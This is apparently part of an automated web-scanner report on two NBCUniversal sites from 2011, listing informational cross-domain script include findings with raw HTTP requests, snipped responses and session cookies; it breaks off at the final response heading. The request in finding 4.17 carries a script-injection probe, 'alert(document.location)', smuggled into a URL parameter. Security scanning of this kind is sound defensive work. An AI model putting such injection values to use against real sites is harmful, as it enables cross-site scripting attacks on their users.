HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:18:39 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 18805 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:18:39 GMT Date: Mon, 15 Aug 2011 22:18:39 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]... </span> <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"> </script>...[SNIP]... <div class="share-icons"> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=ankur79"> </script>...[SNIP]...
4.9. http://www.nbcuni.com/film
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/film
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /film HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446617206; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:16:54 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 14362 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:16:54 GMT Date: Mon, 15 Aug 2011 22:16:54 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.10. http://www.nbcuni.com/parks-resorts
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/parks-resorts
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /parks-resorts HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446621967; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:16:56 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 13779 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:16:56 GMT Date: Mon, 15 Aug 2011 22:16:56 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.11. http://www.nbcuni.com/parks-resorts/universal-parks-resorts
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/parks-resorts/universal-parks-resorts
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://s7.addthis.com/js/250/addthis_widget.js http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /parks-resorts/universal-parks-resorts HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/parks-resorts User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446669827; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Parks%252520%252526%252520Resorts%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fparks-resorts%25252Funiversal-parks-resorts%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:43 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 21145 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:43 GMT Date: Mon, 15 Aug 2011 22:17:43 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]... </span> <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"> </script>...[SNIP]... <div class="share-icons"> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=ankur79"> </script>...[SNIP]...
4.12. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_css/_assets/enlarge.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/wordpress/wp-content/themes/theme-nbcuni/_css/_assets/enlarge.png
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /wordpress/wp-content/themes/theme-nbcuni/_css/_assets/enlarge.png HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/parks-resorts/universal-parks-resorts User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446671973; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:49 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 12573 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:49 GMT Date: Mon, 15 Aug 2011 22:17:49 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.13. http://www.nbcuniversalstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446670? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446670? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446670? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446670? http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js
Request
GET /?v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com//?v=nbc_the-office&icid=nbcu_homepage_flash_the-office_show_button User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 72715 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:50 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446670?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446670?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446670?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446670?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <!-- End Dotomi Tag --> <script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
4.14. http://www.nbcuniversalstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=5;sz=246x100;abr=!ie;ord=1313446628? http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=6;sz=726x100;abr=!ie;ord=1313446628? http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=7;sz=246x100;abr=!ie;ord=1313446628? http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=8;sz=726x100;abr=!ie;ord=1313446628? http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js
Request
GET / HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 89483 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:09 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:07 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=5;sz=246x100;ord=1313446628?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=5;sz=246x100;abr=!ie;ord=1313446628?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=6;sz=726x100;ord=1313446628?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=6;sz=726x100;abr=!ie;ord=1313446628?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=7;sz=246x100;ord=1313446628?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=7;sz=246x100;abr=!ie;ord=1313446628?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=8;sz=726x100;ord=1313446628?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=8;sz=726x100;abr=!ie;ord=1313446628?"> </script>...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
4.15. http://www.nbcuniversalstore.com//
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
//
Issue detail
The response dynamically includes the following scripts from other domains:http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446654? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446654? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446654? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446654? http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js
Request
GET //?v=nbc_the-office&icid=nbcu_homepage_flash_the-office_show_button HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/nbcuniversalstore/flash/nbcu_Show_Slider.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253AHome%2520Page%7C1313448437353%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 72767 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:34 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446654?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446654?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446654?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446654?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <!-- End Dotomi Tag --> <script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
4.16. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The response dynamically includes the following scripts from other domains:http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678? http://api.recaptcha.net/js/recaptcha_ajax.js http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68244 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
4.17. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The response dynamically includes the following scripts from other domains:http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446864? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446864? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446864? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446864? http://api.recaptcha.net/js/recaptcha_ajax.js http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(document.location)//dbde9cd2c5d&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/9 Cookie: DACART=qK2mk5eRnKeppoaV; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253AThe%2520Office%25202012%2520Day%2520to%2520Day%2520Calendar%253ADetail%7C1313448643208%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
